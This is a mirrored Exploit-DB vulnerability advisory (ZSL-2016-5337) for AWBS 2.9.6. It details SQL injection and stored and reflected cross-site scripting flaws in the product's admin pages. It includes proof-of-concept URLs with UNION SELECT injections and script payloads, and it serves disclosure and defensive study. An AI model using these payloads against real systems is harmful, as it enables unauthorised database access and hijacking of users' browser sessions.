exploit-db-mirror/platforms/php/webapps/40062.txt
Offensive Security 52cf6a3185 DB: 2016-07-07
9 new exploits

CIMA DocuClass ECM - Multiple Vulnerabilities
24online SMS_2500i 8.3.6 build 9.0 - SQL Injection
Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes
Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities
PaKnPost Pro 1.14 - Multiple Vulnerabilities
GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution
OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities
Samsung Android JACK - Privilege Escalation
Nagios XI Chained Remote Code Execution
2016-07-07 05:06:28 +00:00

100 lines
No EOL
3.4 KiB
Text
Executable file

AWBS v2.9.6 Multiple Remote Vulnerabilities
Vendor: Total Online Solutions, Inc.
Product web page: http://www.awbs.com
Affected version: 2.9.6
Platform: PHP
Summary: Whether starting new or looking to expand your
existing web hosting and/or domain registration business,
the AWBS fully automated solutions and unique features will
allow you achieve your goal with minimum effort and cost.
Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
Input passed via the 'cat' and 'so' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code. Multiple cross-site scripting vulnerabilities were also
discovered. The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Apache
PHP/5.3.28
MySQL/5.5.50-cll
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5337
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php
08.06.2016
--
1. SQL Injection:
-----------------
Parameter: cat, so (GET)
POC URL:
http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
http://localhost/admin/hostingadmin.php?list=f&so=domain%27
http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100
2. Cross-Site Scripting (Stored):
---------------------------------
http://localhost/admin/cmanage.php
Parameters: reason (POST)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://localhost/admin/helpdesk.php
Parameters: hd_name, hd_url, hd_subject (POST)
Payload(s):
Content-Disposition: form-data; name="hd_name"
"><script>alert(1)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_url"
"><script>alert(2)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_subject"
<img src=x onerror=alert(3)>
-----------------------------28698210634144
3. Cross-Site Scripting (Reflected):
------------------------------------
http://localhost/admin/useradmin.php
Parameters: list (POST)
http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameters: search, cat, list, so (GET)
http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameter: list (GET)
http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
Parameters: id, sd (GET)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E